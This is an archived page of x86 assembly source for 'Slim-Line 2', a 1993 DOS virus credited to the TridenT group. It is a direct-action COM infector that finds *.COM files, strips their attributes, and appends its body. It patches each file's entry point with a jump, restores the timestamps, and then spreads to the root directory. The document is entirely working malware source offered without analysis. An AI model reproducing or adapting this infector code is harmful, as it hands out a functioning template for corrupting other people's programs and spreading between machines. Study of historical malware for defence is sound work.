home *** CD-ROM | disk | FTP | other *** search
- ;
- ; The Slim-Line 2 virus, from the Slim-line virus collection.
- ; (C) 1993 by [DαRkRαY]/TridenT
- ;
- ; And this time it's a direct action COM infector.
- ; <will be commented soon>
-
- _CODE SEGMENT
- ASSUME CS:_CODE, DS:_CODE, ES:_CODE
- ORG 100h
-
- FIRST:
- DB 'D', 0E9h, 000h, 000h
-
- VX:
- MOV BP,00000h
-
- LEA SI,[BP + OLD_4_BYTES]
- MOV DI,00100h
- PUSH DI
- MOV CX,DI
- MOVSW
- MOVSW
-
- XOR SI,SI
- LEA DI,[BP + LAST + 2]
- PUSH SI
- PUSH DI
- PUSH CX
- REP MOVSB
-
- FIND_FILE:
- MOV AH,04Eh
- LEA DX,[BP + FIND]
- MOV CL,27h
- AGAIN:
- INT 021h
- JC GO_ROOT
-
- YES_FILE:
- MOV AX,04300h
- MOV DX,09Eh
- INT 021h
- PUSH CX
-
- MOV AX,04301h
- XOR CX,CX
- INT 021h
-
- MOV AX,03D02h
- INT 021h
- XCHG AX,BX
-
-
- MOV AX,05700h
- INT 021h
- PUSH CX
- PUSH DX
-
- MOV AH,03Fh
- MOV CX,004h
- LEA DX,[BP + OLD_4_BYTES]
- INT 021h
-
- MOV SI,DX
- LODSW
- CMP AX,0E944h
- JE DONT_INFECT
-
- MOV AL,02h
- CALL SET_POINTER
-
- SUB AX,00004h
- MOV WORD PTR [BP + VX + 2],AX
- MOV WORD PTR [BP + NEW_4_BYTES + 2],AX
-
- MOV AH,040h
- MOV CL,(LAST - VX)
- LEA DX,[BP + VX]
- INT 021h
-
- XOR AX,AX
- CALL SET_POINTER
-
- MOV AH,040h
- MOV CL,004h
- LEA DX,[BP + NEW_4_BYTES]
- INT 021h
-
- DONT_INFECT:
- MOV AX,05701h
- POP DX
- POP CX
- INT 021h
-
- MOV AH,03Eh
- INT 021h
-
- MOV AX,04301h
- POP CX
- MOV DX,09Eh
- INT 021h
-
- MOV AH,4Fh
- JMP AGAIN
-
- GO_ROOT:
-
- MOV AH,03Bh
- LEA DX,[BP + ROOT]
- INT 021h
- JC EXIT
- JMP FIND_FILE
-
- EXIT:
- POP CX
- POP SI
- POP DI
- REP MOVSB
-
- RET
-
- SET_POINTER:
- MOV AH,042h
- XOR CX,CX
- CWD
- INT 021h
- RET
-
- OLD_4_BYTES: NOP
- NOP
- NOP
- RET
-
- FIND DB "*.COM", 000h
- ROOT DB "\", 000h
-
- CUT DB ""
- MARKER DB "[DR/TridenT]"
- NAMED DB "Slim-Line 2 v0.9ß"
- COUNTRY DB "Holland"
- NEW_4_BYTES DB 'D', 0E9h
- LAST:
-
- _CODE ENDS
- END FIRST
-
